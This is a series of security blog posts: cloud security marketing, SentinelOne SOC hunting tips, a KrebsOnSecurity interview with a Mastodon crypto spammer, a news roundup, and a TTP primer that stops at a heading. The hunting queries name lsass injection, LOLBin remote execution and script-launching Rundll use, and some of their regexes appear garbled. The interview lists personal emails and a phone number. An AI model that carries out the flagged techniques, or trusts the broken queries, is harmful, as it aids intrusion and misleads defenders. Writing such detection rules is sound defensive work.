Cloud-native security solutions continue to evolve, providing specialized tools designed specifically for cloud environments. These tools offer features such as cloud workload protection, container security, serverless security, and cloud data protection. Many businesses leverage cloud-native tools to address the unique challenges of modern cloud deployments in a way that is scalable, effective, and streamlined to work in harmony with existing infrastructure.

Cloud-native security tools often leverage automation and orchestration capabilities provided by cloud platforms. Based on predefined templates or dynamically changing conditions, they can automatically provision and configure security controls, policies, and rules to reduce manual effort. Since many cloud breaches are the result of human errors, such tools can help security teams deploy consistent and up-to-date security configurations across their businesses’ cloud resources.

Continuous monitoring of cloud environments is essential for early threat detection and prompt incident response. Cloud-native security tools enable centralized monitoring and correlation of security events across cloud and on-premises infrastructure. As they are designed to detect and mitigate cloud-specific threats and attack vectors, cloud-native solutions can cater to characteristics of cloud environments, such as virtualization, containerization, and serverless computing, identifying the specific threats targeting these technologies.

Cloud Security Intelligence Using AI & ML

The use of advanced analytics, threat intelligence, artificial intelligence (AI) and machine learning (ML) is on the rise in cloud security. These technologies enable the detection of sophisticated threats, identification of abnormal behavior, and proactive threat hunting to mitigate potential risks.

Both AI and ML are needed to accelerate the quick decision-making process needed to identify and respond to advanced cyber threats and a fast-moving threat landscape. Businesses that adopt AI and ML algorithms can analyze vast amounts of data and identify patterns indicative of cyber threats. They can detect and classify known malware, phishing attempts, and other malicious activities within cloud environments.

By analyzing factors such as system configurations, vulnerabilities, threat intelligence feeds, and historical data, the algorithms allow security teams to prioritize security risks based on their severity and potential impact. This means resources can be focused on addressing the most critical vulnerabilities or threats within the cloud infrastructure.

From a long-term perspective, the adoption of AI and ML in day-to-day operations enable security leaders to build a strong cloud security posture through security policy creation and enforcement, ensuring that policies adapt to changing cloud environments and truly address emerging threats.

Conclusion

Securing the cloud is now an essential part of a modern enterprise’s approach to risk and cyber threat management. By understanding how the cloud surface has evolved, businesses can better evaluate where they are on this development path and where they are headed. Business leaders can use this understanding to ensure that the organization’s security posture includes a robust plan for defending and protecting cloud assets. By prioritizing and investing in cloud security, enterprises can continue to safeguard their organizations against developing threats and build a strong foundation for secure and sustainable growth.

How SentinelOne’s AI-Powered Platform Supports Cloud Security Strategies

SentinelOne focuses on acting faster and smarter through AI-powered prevention and autonomous detection and response. SentinelOne’s Singularity™ Cloud ensures organizations get the right security in place to continue operating in their cloud infrastructures safely.

Learn more about how Singularity helps organizations autonomously prevent, detect, and recover from threats in real time by contacting us or requesting a demo.

Singularity Cloud
Simplifying security of cloud VMs and containers, no matter their location, for maximum agility, security, and compliance.

SOC Team Power Up | 7 Practical Tips To Find and Stop Threats Faster with SentinelOne

In our recent series on Mastering the Art of SOC Analysis, we explored how aspiring SOC Analysts can develop the skills needed in today’s complex threat environment. From learning the fundamentals like network and malware analysis to understanding cloud security and effective internal and external communication.

Essential to every SOC analyst is having the right tools and knowing how to use them to their full potential. Many SOCs worldwide partner with SentinelOne to maximize their resources and accelerate their ability to respond to incidents, hunt for threats and be more effective in securing the enterprise.

In this blog post, we share seven practical tips analysts can use within the SentinelOne console to power up day-to-day operations and find and stop attacks fast.

1. Leverage PowerQuery to Hunt for Abnormal Activities

In the past, SOC personnel needed to hunt for one IOC at a time, spending time trying to correlate it back to a meaningful activity. Today, analysts can be much more effective, and even spend time in proactive hunting with the help of PowerQuery.

Here are a few examples to understand the power of this.

A non-Windows process writes files to the temp directory

AgentOS = "windows" and objectType = "file" and FileFullName Contains Anycase "temp" and FileIsExecutable IS TRUE and SrcProcVerifiedStatus != "verified" AND SrcProcPublisher != "MICROSOFT WINDOWS"

Rundll or Regsvr executes a script

(SrcProcDisplayName = "Windows host process (Rundll32)" or SrcProcDisplayName = "Microsoft(C) Register Server") AND SrcProcCmdLine RegExp ".*(javascript|mshtml|runhtmlapplication).*"

Bat or cmd files are dropped directly to a temp folder

objectType = "file" and FileFullName containscis "windowstemp" and (filefullname endswithcis ".bat" or filefullname endswithcis ".cmd" ) and FileFullName RegExp "windows\temp\[^\{}]+$"

A non-Windows process injects to a Windows process

(SrcProcVerifiedStatus != "verified" AND SrcProcPublisher != "MICROSOFT WINDOWS" AND TgtProcVerifiedStatus = "verified" AND TgtProcPublisher != "MICROSOFT WINDOWS" and ObjectType = "cross_process") or (indicatorName = "RemoteInjection" AND (IndicatorMetadata Contains Anycase "lsass.exe" or IndicatorMetadata Contains Anycase "explorer.exe" or IndicatorMetadata Contains Anycase "svchost.exe"))

Cmd runs with /c and LOLBins for remote execution

SrcProcCmdLine contains anycase "cmd" and SrcProcCmdLine contains anycase "/c" and SrcProcCmdLine RegExp "(at|sc|schtasks|wmic)(s|"|.exe).*cmd.*s/cs"

How It Helps

PowerQuery allows analysts to easily identify suspicious activities that require investigation. It can be as simple or as powerful as you need it to be, offering a rich set of commands to transform and manipulate data as well as many pre-built templates. See the built-in documentation for more examples and comprehensive help on PowerQuery.

2. Track Every Login Attempt in Your Environment

Basic queries can be used to view real-time login data. These simple queries can be modified and scaled to your environmental needs. The idea is to provide open-ended queries where analysts can then down-select as they see fit.

Examples of such queries are:

endpointname contains "Goat" and LoginIsSuccessful is TRUE
endpointname contains "server" and LoginIsAdministratorEquivalent IS TRUE/FALSE

SOC teams can further utilize this to enrich their attack data and quickly perform mitigation and hunting steps such as:

  • Disable the compromised user
  • Pivot to Deep Visibility to hunt for other malicious activity by the compromised user
  • Potentially identify a vulnerable device by finding which machine belongs to the compromised user

How It Helps

Many incidents target individual hosts, from which attackers will attempt to further strengthen their access through lateral movement techniques. Monitoring login activity can help identify patterns of suspicious activity on the network. In the event of an incident, login data can help to more effectively identify the source and the extent of compromise.

3. Track Lateral Movement of Attackers

The ability to pivot from a single device point of view to an environment perspective, allows the SOC analyst to see the big picture. In most cases, attackers are trying to expand their foothold and move laterally from one device to other components on the network. Tracking this activity can be done with the SentinelOne console in the following way.

The SentinelOne Console provides visibility into lateral movement events directly within the context of an attack chain.

Lateral Movement events can be viewed quickly by opening the Incidents widget in the left-hand navigation pane of the console.  Results can be filtered via the ‘Threat Details’ free text search.

This view allows Lateral Movement events to be viewed exclusively, while also allowing analysts to ‘zoom out’ scope-wise to digest the full context of the event.

Analysts can also hunt for lateral movement events viewed in Storyline™ Additional Methods/DV Queries.

Further, PowerQuery can be leveraged in these scenarios, too. For example, attacks often create scheduled tasks to kickstart a lateral movement attack during work hours with privileges. Therefore, hunting for these events can lead to new discoveries or additional pivot points.

SrcProcCmdLine RegExp “shtasks” AND SrcProcName !=”Manages scheduled tasks”

Similarly, Deep Visibility can be used to hunt for high-level network behaviors, while also excluding traffic originating from SentinelOne processes. This can also be a good ‘starting point’ for discovering and analyzing anomalies in internal network traffic.

(DstPort = “135” or DstPort = “5985" or DstPort = “5986”) and (SrcProcDisplayName Does Not ContainCIS “svchost” or SrcProcDisplayName  Does Not ContainCIS “SentinelOne”)

How It Helps

Lateral movement is one of the most common techniques used by sophisticated actors. These tips can help analysts readily identify and stop lateral movement attempts in their environments.

4. Understand the Scope of a Security Incident or Breach Attempt

Experienced SOC engineers know the feeling of investigating something only to realize later it was a single attempt or even a false positive. However, when you have access to all your environment telemetry at your fingertips, the likelihood of a wild goose chase is reduced. When the analyst suspects there has been a security incident, use PowerQuery to perform the following steps to identify the scope of the issue:

  • Count the number of affected machines. This will give you an idea of how widespread the incident is.
  • Track the communication between infected machines and any malicious command and control servers to identify the malicious actors behind the attack.
  • Count failed login attempts by user name to identify potential initial access points used by the attackers.

How It Helps

Following these steps, analysts can quickly identify the difference between a major breach or an isolated event.

5. Find Hidden Threats by Examining Malicious Network Traffic

By analyzing network traffic, analysts can identify patterns or indicators that may indicate the presence of malicious activity, such as communication with known malicious IP addresses, unusual port usage, and protocols. Deep Visibility ensures analysts have full visibility into any artifacts dropped by specific URLs so they can assess whether they need to tweak firewall rules, denylist URLs, and others.

Enter an ‘open-ended’ query to view all event data, both malicious and benign, and then filter down the results as needed. Example: EndpointName Contains "".

Next, click the ‘DNS’ tab to filter and view DNS request correlation.

From the table of results, scroll horizontally to the ‘URL’  column and view all URLs associated with each endpoint.

How It Helps

Deep Visibility can help the security team to quickly identify potential threats, such as malware, phishing, and other cyber attacks, and take appropriate action.

Analyzing network traffic also can reveal data exfiltration attempts, where attackers are trying to steal sensitive data from the network. This can allow you to quickly identify the affected systems and data, and take action to prevent further data loss.

6. Use Visual Layers for Faster Triage

SOC teams can educe the triage process by expanding and moving freely between processes and their related graphs. The layering widget within Deep Visibility allows SOC analysts to maintain a cohesive visual context to support their investigations.

In the results table after a Deep Visibility search, if a process has a graph available, the name of the process shows with a hyperlink.

Click a link to open the graph in a new tab, then add or remove layers to the Process Graph via the Layers widget on the far right side of the XDR Process Graph.

Selected layers are indicated on relevant nodes in the XDR Process Graph:

How It Helps

By enabling layers, analysts can quickly understand what malware is doing through visual highlighting of behavioral indicators associated with each process.

7. Find Vulnerable Applications in Your Environment

Common Vulnerabilities and Exposures (CVEs) fulfill an essential role in the identification and detection of vulnerabilities in the threat landscape. CVE identification by SOC analysts allows organizations to document and prioritize vulnerabilities, assess their severity through comparison, and track their cyber resilience over time.

To streamline the many tasks SOC analysts are responsible for, the SentinelOne console automatically inventories applications on an organization’s endpoints. High risk and vulnerable endpoint devices are clearly noted and correlated to CVE IDs, which are made easily visible with the console view.

In the SentinelOne console, navigate to the ‘Application Management’ page to see an at-a-glance view of all associated CVEs.

Select filters to sort by CVE severity, CVSS score, remediation level, and more. Multiple levels of filtering can be applied at once.

Filtering can be done via the ‘Select Filters’ widget.  Filtering criteria includes Application Names, CVSS Score, Exploitability, Report Confidence and more.

How It Helps

Security and IT teams can use the Application Management view to identify vulnerable software and prioritize patch management.

Conclusion

Having the right people, with the right skills and the right tools is a large part of the battle in defeating the huge range of different cyber threats businesses now face. Ensuring that analysts are maximizing the tools at their disposal is critical. In this post, we’ve explored some of the ways that analysts can improve their productivity, efficacy and success in preventing, detecting and remediating threats.

There is a wealth of further information in the product documentation, including examples and further use cases. To find out more about how SentinelOne can empower your SOC team, contact us or request a free demo.

Interview With a Crypto Scam Investment Spammer

Social networks are constantly battling inauthentic bot accounts that send direct messages to users promoting scam cryptocurrency investment platforms. What follows is an interview with a Russian hacker responsible for a series of aggressive crypto spam campaigns that recently prompted several large Mastodon communities to temporarily halt new registrations. According to the hacker, their spam software has been in private use until the last few weeks, when it was released as open source code.

Renaud Chaput is a freelance programmer working on modernizing and scaling the Mastodon project infrastructure — including joinmastodon.org, mastodon.online, and mastodon.social. Chaput said that on May 4, 2023, someone unleashed a spam torrent targeting users on these Mastodon communities via “private mentions,” a kind of direct messaging on the platform.

The messages said recipients had earned an investment credit at a cryptocurrency trading platform called moonxtrade[.]com. Chaput said the spammers used more than 1,500 Internet addresses across 400 providers to register new accounts, which then followed popular accounts on Mastodon and sent private mentions to the followers of those accounts.

Since then, the same spammers have used this method to advertise more than 100 different crypto investment-themed domains. Chaput said that at one point last week the volume of bot accounts being registered for the crypto spam campaign started overwhelming the servers that handle new signups at Mastodon.social.

“We suddenly went from like three registrations per minute to 900 a minute,” Chaput said. “There was nothing in the Mastodon software to detect that activity, and the protocol is not designed to handle this.”

One of the crypto investment scam messages promoted in the spam campaigns on Mastodon this month.

Seeking to gain a temporary handle on the spam wave, Chaput said he briefly disabled new account registrations on mastodon.social and mastondon.online. Shortly after that, those same servers came under a sustained distributed denial-of-service (DDoS) attack.

Chaput said whoever was behind the DDoS was definitely not using point-and-click DDoS tools, like a booter or stresser service.

“This was three hours non-stop, 200,000 to 400,000 requests per second,” Chaput said of the DDoS. “At first, they were targeting one path, and when we blocked that they started to randomize things. Over three hours the attack evolved several times.”

Chaput says the spam waves have died down since they retrofitted mastodon.social with a CAPTCHA, those squiggly letter and number combinations designed to stymie automated account creation tools. But he’s worried that other Mastodon instances may not be as well-staffed and might be easy prey for these spammers.

“We don’t know if this is the work of one person, or if this is [related to] software or services being sold to others,” Chaput told KrebsOnSecurity. “We’re really impressed by the scale of it — using hundreds of domains and thousands of Microsoft email addresses.”

Chaput said a review of their logs indicates many of the newly registered Mastodon spam accounts were registered using the same 0auth credentials, and that a domain common to those credentials was quot[.]pw.

A DIRECT QUOT

The domain quot[.]pw has been registered and abandoned by several parties since 2014, but the most recent registration data available through DomainTools.com shows it was registered in March 2020 to someone in Krasnodar, Russia with the email address edgard011012@gmail.com.

This email address is also connected to accounts on several Russian cybercrime forums, including “__edman__,” who had a history of selling “logs” — large amounts of data stolen from many bot-infected computers — as well as giving away access to hacked Internet of Things (IoT) devices.

In September 2018, a user by the name “ципа” (phonetically “Zipper” in Russian) registered on the Russian hacking forum Lolzteam using the edgard0111012@gmail.com address. In May 2020, Zipper told another Lolzteam member that quot[.]pw was their domain. That user advertised a service called “Quot Project” which said they could be hired to write programming scripts in Python and C++.

“I make Telegram bots and other rubbish cheaply,” reads one February 2020 sales thread from Zipper.

Quotpw/Ahick/Edgard/ципа advertising his coding services in this Google-translated forum posting.

Clicking the “open chat in Telegram” button on Zipper’s Lolzteam profile page launched a Telegram instant message chat window where the user Quotpw responded almost immediately. Asked if they were aware their domain was being used to manage a spam botnet that was pelting Mastodon instances with crypto scam spam, Quotpw confirmed the spam was powered by their software.

“It was made for a limited circle of people,” Quotpw said, noting that they recently released the bot software as open source on GitHub.

Quotpw went on to say the spam botnet was powered by well more than the hundreds of IP addresses tracked by Chaput, and that these systems were mostly residential proxies. A residential proxy generally refers to a computer or mobile device running some type of software that enables the system to be used as a pass-through for Internet traffic from others.

Very often, this proxy software is installed surreptitiously, such as through a “Free VPN” service or mobile app. Residential proxies also can refer to households protected by compromised home routers running factory-default credentials or outdated firmware.

Quotpw maintains they have earned more than $2,000 sending roughly 100,000 private mentions to users of different Mastodon communities over the past few weeks. Quotpw said their conversion rate for the same bot-powered direct message spam on Twitter is usually much higher and more profitable, although they conceded that recent adjustments to Twitter’s anti-bot CAPTCHA have put a crimp in their Twitter earnings.

“My partners (I’m programmer) lost time and money while ArkoseLabs (funcaptcha) introduced new precautions on Twitter,” Quotpw wrote in a Telegram reply. “On Twitter, more spam and crypto scam.”

Asked whether they felt at all conflicted about spamming people with invitations to cryptocurrency scams, Quotpw said in their hometown “they pay more for such work than in ‘white’ jobs” — referring to legitimate programming jobs that don’t involve malware, botnets, spams and scams.

“Consider salaries in Russia,” Quotpw said. “Any spam is made for profit and brings illegal money to spammers.”

THE VIENNA CONNECTION

Shortly after edgard011012@gmail.com registered quot[.]pw, the WHOIS registration records for the domain were changed again, to msr-sergey2015@yandex.ru, and to a phone number in Austria: +43.6607003748.

Constella Intelligence, a company that tracks breached data, finds that the address msr-sergey2015@yandex.ru has been associated with accounts at the mobile app site aptoide.com (user: CoolappsforAndroid) and vimeworld.ru that were created from different Internet addresses in Vienna, Austria.

A search in Skype on that Austrian phone number shows it belongs to a Sergey Proshutinskiy who lists his location as Vienna, Austria. The very first result that comes up when one searches that unusual name in Google is a LinkedIn profile for a Sergey Proshutinskiy from Vienna, Austria.

Proshutinskiy’s LinkedIn profile says he is a Class of 2024 student at TGM, which is a Christian mission school in Austria. His resume also says he is a data science intern at Mondi Group, an Austrian manufacturer of sustainable packaging and paper.

Mr. Proshutinskiy did not respond to requests for comment.

Quotpw denied being Sergey, and said Sergey was a friend who registered the domain as a birthday present and favor last year.

“Initially, I bought it for 300 rubles,” Quotpw explained. “The extension cost 1300 rubles (expensive). I waited until it expired and forgot to buy it. After that, a friend (Sergey) bought [the] domain and transferred access rights to me.”

“He’s not even an information security specialist,” Quotpw said of Sergey. “My friends do not belong to this field. None of my friends are engaged in scams or other black [hat] activities.”

It may seem unlikely that someone would go to all this trouble to spam Mastodon users over several weeks using an impressive number of resources — all for just $2,000 in profit. But it is likely that whoever is actually running the various crypto scam platforms advertised by Quotpw’s spam messages pays handsomely for any investments generated by their spam.

According to the FBI, financial losses from cryptocurrency investment scams dwarfed losses for all other types of cybercrime in 2022, rising from $907 million in 2021 to $2.57 billion last year.

The Good, the Bad and the Ugly in Cybersecurity – Week 20

Cyber Sanctions | Russian National Faces Multiple Charges for Ransomware Operations

The US government has announced cyber-related sanctions on Mikhail Pavlovich Matveev; a Russian national also known as Wazawaka, m1x, Boriselcin, and Uhodiransomwar online. For his alleged involvement in targeted hijacking activities against American law enforcement, schools, and businesses, Matveev faces charges for conspiring to damage protected computer equipment, conspiring to transmit ransom demands, and intentionally damaging protected computers. All charges, if convicted, spell a 20-year prison term at the very least.

Operating out of his native Russia, Matveev reportedly led several campaigns using LockBit, Babuk, and Hive ransomware since 2020, earning him some $200 million in ransom demands over the years. The DoJ’s press release noted that these campaigns have affected thousands of victims, including healthcare entities, and government agencies. Information leading up to Matveev’s arrest will be rewarded up to $10 million and he has been added to the FBI’s Most Wanted List.

LockBit, Babuk, and Hive ransomware all share a similar modus operandi. They involve an intrusion via a vulnerable computer system leading to encryption and data theft. Both LockBit and Hive are ransomware-as-a-service (RaaS) groups infamous for leveraging double extortion against their victims. While Hive was shut down by authorities earlier this year, LockBit ransomware continues to be prolific. As for Babuk, its source code was leaked two years ago but this has since spawned at least ten new ransomware families. In an interview given last summer, Matveev confirmed that he was one of the original developers and administrators behind Babuk.

According to the U.S. Treasury, 75% of all ransomware-related incidents are traced back to Russian-backed attackers and the top five highest grossing variants available today are connected to Russian threat actors.

macOS Attacks | Increased Threat Level After Appearance of New Zero Days and Attack Frameworks

It’s been a busy week in macOS security. A Go-based implementation of Cobalt Strike Beacon called ‘Geacon’ was this week reported to be on the rise, while Apple issued patches across its operating system platforms for multiple software bugs, including three zero day vulnerabilities.

An open source port of well-known attack simulation kit Cobalt Strike was paid little attention when it debuted on GitHub some four years ago, but two forks of the Geacon project, Geacon Plus and Geacon Pro, which appeared late last year appear to be behind a rising number of sightings of Geacon in the wild.

SentinelOne’s report this week highlighted two examples of Geacon payloads being packaged inside fake macOS applications. One case featured an application bundle masquerading as SecureLink, a legitimate enterprise application used for remote support, with a Geacon Pro payload.

Late on Thursday, Apple also released fixes for three zero day bugs, CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373, in its WebKit browser engine, widely in use by Safari and other browsers across Apple’s platforms. CVE-2023-32409 is a sandbox escape that allows malicious code embedded in webpages to execute outside of its protected container. CVE-2023-28204 may enable attackers to access sensitive information on the device via maliciously crafted web content, and CVE-2023-32373 may lead to arbitrary code execution. In all three cases, Apple says it is aware of reports that the bugs may have been actively exploited.

The security flaws impact a wide range of Apple devices and operating system versions, and updates are available for Big Sur, Monterey and Ventura versions of macOS, as well as iOS, iPadOS, watchOS and tvOS. Users are urged to apply patches as soon as possible.

Social Engineering | Potential Risks Surrounding Google’s New Top-Level Domains

Two of Google’s newly released top-level domains (TLD), .zip and .mov, have cybersecurity experts warning against potential phishing and malware attacks. Earlier this month, Google introduced eight new TLDs to the general public, available to anyone purchasing a domain. Since .zip and .mov are widely-used file extensions, the release gives threat actors another way to trick unsuspecting users who think they are accessing legitimate compressed files or videos into clicking malicious URLs.

To further the cause for concern, some online messaging platforms and social media automatically convert ZIP files into clickable links, leading the user quickly to a website of the same address. Since internet users regularly post instructions that reference zip files and videos directly, threat actors could begin to create malicious sites named after commonly-shared files to launch phishing schemes or deploy malware onto the victim’s device. This use case is especially dangerous in corporate environments where just one infected endpoint could infect an entire network.

Since the launch of these new TLDs, there have been debates in the IT community about the severity of the issue. Google has responded to the matter, citing that the risk of confusion between domain names and file names is an existing challenge and can be mitigated through browser security measures. Security practitioners fall back on the suggestion to check links before clicking, access links through trusted sites only, and to be wary of files from untrusted sources.

Inside the Mind of a Cyber Attacker | Tactics, Techniques, and Procedures (TTPs) Every Security Practitioner Should Know

Tactics, techniques, and procedures (TTPs) are the blueprint of threat actors’ attacks – understanding them allows cyber defenders to better respond to sophisticated attacks. Since the threat landscape continues to become more complex with advancements in malware, nation-state APT campaigns, and cybercrime-as-a-service offerings, TTPs remain a critical source of how enterprises can stay ahead of attacks.

TTPs allow security professionals to look inside the minds of threat actors and understand their motivations and malicious goals. This is the first step in crafting effective countermeasures and a long lasting cyber defense posture. This post dives into the evolving TTPs used by modern cyber attackers and draws on recent campaigns and examples to underscore the challenges security practitioners face today.

Starting With Why | Peering Into the Motivations & Goals of Cyber Attackers

Understanding the motivations behind a cyberattack can greatly enhance the ability to effectively protect the organization. Breaking down the ‘who’, ‘why’ and ‘what’ of the attack can help defenders build a profile of the attackers including what they stand to gain in the event of a successful attack, how they are monetizing these gains, and how they are likely to strike again.

Based on their motivations and capabilities, there are six main reasons behind cyberattacks:

  1. Financial Gain – Cybercriminals often seek to steal sensitive data, such as credit card information or intellectual property (IP), to sell on the dark web or to use in other criminal activities. Cybercriminals motivated by profit are typically indifferent to who their targets are and what they stand for. Examples of financially motivated attacks include banking trojans like Emotet and ransomware, such as the DarkSide attack on Colonial Pipeline and the rash of double-extortion attacks by Ransomware-as-a-Service gangs like LockBit.
  2. Espionage – Nation-state actors and other advanced persistent threat (APT) groups often conduct cyber espionage campaigns to gather intelligence or steal IP for strategic purposes. They are usually funded or sponsored directly by the nation and target government-run organizations, opposing political entities, and large businesses. A well-known example of a cyber espionage campaign is the Stuxnet worm, which targeted Iranian nuclear facilities and more recently Metador, an unattributed threat actor targeting telcos, ISPs and universities.
  3. Disruption – Some cyber attackers aim to cause disruption or destruction, either for ideological reasons or as a form of ‘hacktivism’. The primary goal of hacktivists is to bring awareness to their cause through the exposure of secrets and sensitive information, or by taking down services or organizations deemed to be part of the opposition. Examples include the DDoS attacks carried out by Anonymous or the NotPetya ransomware attack, which caused significant damage to businesses worldwide. A more recent example of this at a mass scale is the AcidRain malware used to render Viasat KA-SAT modems inoperable in the first few months of the ongoing Russian-Ukrainian conflict.
  4. Cyber Terrorism – Cyber terrorism melds together two significant concerns – attacks using sophisticated technology, and traditional terrorism. Cyber terrorists are focused on attacking critical services to intentionally cause harm to further their political, economic, technical, or military agendas. They often target state services and essential industries to maximize destruction and disruption such as the MeteorExpress attack on the Iranian train system. Cyber terrorism also seems to intimate, coerce, or influence vulnerable audiences to sow fear or force political changes.
  5. Personal Causes – Unlike external threat actors that need to break into a targeted workspace, malicious insiders already have access rights into the environment and can work from within to get around the cybersecurity framework. Personal reasons such as revenge or retaliation are usually the motivation behind insider threats. Often in these cases, malicious insiders seek to steal and leak classified information or IP in the name of their personal cause.
  6. Attention & Notoriety – Script kiddies are low-level, unskilled attackers that leverage tools and available kits designed by others to penetrate a targeted system. Motivating factors for script kiddies are usually quite simple – they seek attention, excitement, and chaos. Also, cyberattackers motivated by reputation and attention are known to actively seek targets that are widely known and required to disclose the attack rather than smaller, unknown ones.

Reading the Blueprints | How Tactics, Techniques, and Procedures (TTPs) Help Cyber Defenders

TTPs play an essential role in empowering security defenders to combat cyber threats effectively. By analyzing and understanding TTPs, defenders gain valuable insights into the behaviors and methodologies employed by adversaries. This accelerates the process for identifying potential attacks, developing proactive defense strategies, and implementing security measures specific to business and industry risks.

Organizations like NIST and MITRE categorize and catalog the behaviors of threat actors into tactics, techniques, and procedures; collectively known as TTPs. Tactics refer to the highest-level description of the behavior, techniques are descriptions that give the tactic context, and procedures describe the activities to give context of the technique. To break this down further:

  • Tactics – These are the overarching strategies and goals behind an attack. They can be thought up as the ‘why’ to the tactical objectives and explain the reasons fueling the cyberattacker. Tactics are important for cyber defenders as they can be used to build the threat profile of the actor being investigated. Many threat actors and groups are recognizable by the use of specific tactics.
  • Techniques – These are the methods that the threat actor uses to launch and engage in the attack to achieve their objective. Actors often use many techniques during their campaign to facilitate initial compromise, move laterally within the compromised environment, exfiltrate data, and more. Techniques can be analyzed at every stage of the cyberattack, leaving behind a distinguishable digital footprint of the threat actor.
  • Procedures – These are the step-by-step sequence of actions that make up the attack, including the tools and kits used by the threat actor. During forensic investigations for example, security analysts may perform file system analysis to reconstruct a procedure in order to build out a timeline of the attack. Analysts will also look for modifications to system files, find clues in event logs, and try to build a picture of what happened in each stage of the attack.

Being able to detect patterns and indicators of compromise through TTPs are instrumental in helping security professionals respond promptly to threats. It’s also the trigger for critical improvements in policies and workflows that can stop similar threats in the future. TTPs serve as a foundation for threat intelligence leading to better risk mitigation and facilitating a more collective approach to cybersecurity.

Understanding How TTPs Work in Real-World Attacks

Both the frequency of cyber crime and their constant development continue to increase at staggering rates. Researchers estimate that the world will face 33 billion account breaches in 2023 alone and that attacks are now occurring once every 39 seconds. This section explores some of the most common TTPs used in modern threat campaigns and how they are leveraged in various types of real-world attacks.

Social Engineering

Social engineering is the psychological manipulation of individuals into divulging sensitive information or performing actions that compromise security. This tactic is often employed in phishing campaigns, such as the highly targeted spear-phishing attacks that have been linked to APT groups like APT29, also known as Cozy Bear, and APT28, also known as Sofacy or Fancy Bear. These campaigns often use highly convincing emails that appear to come from legitimate sources, luring victims into clicking malicious links or downloading malware-laden attachments.

Social engineering campaigns utilize various TTPs to manipulate human behavior and exploit vulnerabilities. Other than phishing, common TTPs associated with social engineering include:

  • Pretexting – The attacker creates a plausible scenario or false identity to deceive the target, gaining their trust, and extracting sensitive information.
  • Impersonation – Pretending to be someone else, such as a trusted colleague, authority figure, or service provider, to manipulate the target into providing sensitive data or performing certain actions.
  • Water-holing – Compromising legitimate websites frequently visited by the target audience and injecting malicious code or links to infect visitors’ devices.

Exploiting Vulnerabilities

Attackers often exploit known vulnerabilities in software and hardware to gain unauthorized access to systems or escalate privileges. One recent example is the exploitation of the Microsoft Exchange Server vulnerabilities, dubbed ProxyLogon and attributed to the HAFNIUM APT group. The group used these vulnerabilities to gain access to email accounts and deploy additional malware for further exploitation. Several TTPs are associated with vulnerability exploitation including:

  • Scanning – Conducting network or system scans to identify potential vulnerabilities, such as open ports, unpatched software, or misconfigurations.
  • Zero Day Exploits – Exploiting vulnerabilities that are unknown or have not yet been patched by the software vendor, giving attackers an advantage over defenders.
  • Privilege Escalation – Exploiting vulnerabilities or misconfigurations to elevate privileges and gain higher-level access within a system or network.
  • Remote Code Execution (RCE) – Exploiting vulnerabilities that allow an attacker to execute arbitrary code on a targeted system, providing full control over the compromised device.
  • Denial-of-Service (DoS) Attacks – Overloading a system or network with excessive requests or malicious traffic to disrupt its availability and potentially expose vulnerabilities.

Living Off the Land

“Living off the land” (LotL) is a tactic where attackers use legitimate tools and processes already present on a victim’s system to carry out their attacks, making it more difficult for security solutions to detect their activities. An example of this is the use of PowerShell, a powerful scripting language built into Windows, which has been used in various attacks, including the infamous Emotet banking trojan and the Ryuk ransomware. Threat actors are known to use these TTPs to achieve successful LotL:

  • Windows Management Instrumentation (WMI) Abuse – Leveraging the WMI infrastructure to execute commands, retrieve information, or interact with systems, bypassing security controls.
  • Scripting Language Abuse – Utilizing scripting languages like JavaScript, VBScript, AppleScript, or Python to execute malicious code or automate malicious activities.
  • Fileless Malware – Deploying malware that resides only in memory, leveraging legitimate system processes or functionalities to carry out malicious activities without leaving traditional file-based traces.
  • Masquerading – Disguising malicious files, processes, or commands with legitimate names, making them appear benign to evade detection.

Lateral Movement

Once attackers gain a foothold in a network, they often use lateral movement techniques to move between systems and escalate their privileges. In techniques like pass-the-hash or pass-the-ticket, an attacker uses stolen credentials or authentication tokens to move between systems.

One recent example is the SolarWinds supply chain attack, in which the threat actors used a combination of custom malware, stolen credentials, and legitimate tools to move laterally within the targeted networks, ultimately gaining access to sensitive data and systems. The following TTPs contribute to lateral movement:

  • Remote Desktop Protocol (RDP) Hijacking – Unauthorized control or manipulation of remote desktop sessions to move laterally between systems.
  • Credential Theft and Brute Force Attacks Stealing or cracking credentials to impersonate legitimate users and move laterally within the network.
  • Man-in-the-Middle (MiTM) Attacks – Intercepting network traffic and tampering with communication to gain unauthorized access or escalate privileges.
  • Active Directory Exploitation – Exploiting weaknesses or misconfigurations within the Active Directory infrastructure to escalate privileges or gain unauthorized access to other systems or domains.

Data Exfiltration and Covering Tracks

After achieving their objectives, cyberattackers often exfiltrate the stolen data, using covert channels or encrypted communication to avoid detection. In some cases, attackers also take steps to cover their tracks and maintain persistence, such as deleting logs or using rootkits to hide their presence on compromised systems. A notable example of this is the DarkHotel APT group, known for its highly targeted attacks on luxury hotels, which utilized a combination of custom malware and sophisticated techniques to exfiltrate sensitive data and maintain a low profile within the compromised networks. To wipe away traces of their actions, attackers will often use a combination of these TTPs:

  • Compression and Encryption – Compressing or encrypting stolen data to obfuscate its content and make it more difficult to detect or analyze.
  • Protocol Tunneling – Encapsulating exfiltrated data within other network protocols, such as DNS or HTTP, to bypass security controls and avoid suspicion.
  • Data Obfuscation – Modifying or obfuscating data formats or file extensions to make exfiltrated information appear as benign or unrelated files.
  • Exfiltration Through Trusted Protocols – Utilizing commonly used protocols like FTP, SSH, or HTTP to transfer stolen data, blending it with legitimate network traffic to evade detection.
  • Data Destruction – Deleting or wiping data traces after exfiltration to eliminate evidence and hinder forensic investigations.

Proactive Measures for Security Practitioners

While understanding the TTPs is integral to the development of threat intelligence and defense mechanisms, this alone can only win half the battle. Enterprises must also enforce excellent cyber hygiene protocols and strengthen their security strategy holistically.

Implement a Strong Security Framework

Adopting a robust security framework, such as the NIST Cybersecurity Framework or the CIS Critical Security Controls, can help organizations systematically identify and address potential weaknesses in their security posture. Regularly reviewing and updating these frameworks is crucial to staying ahead of evolving threats.

Continuous Security Training and Awareness

Regular security training and awareness programs for employees can help reduce the risk of successful social engineering attacks. Training should cover topics like phishing, password security, and the importance of reporting suspicious activities.

Patch Management and Vulnerability Scanning

Implementing a robust patch management process and conducting regular vulnerability scans can help organizations identify and address known vulnerabilities in their systems, reducing the attack surface for cyber attackers.

Network Segmentation and Zero Trust

Network segmentation and the implementation of a zero trust security model can help limit lateral movement within a network, making it more difficult for attackers to escalate privileges and access sensitive data.

Monitoring and Incident Response

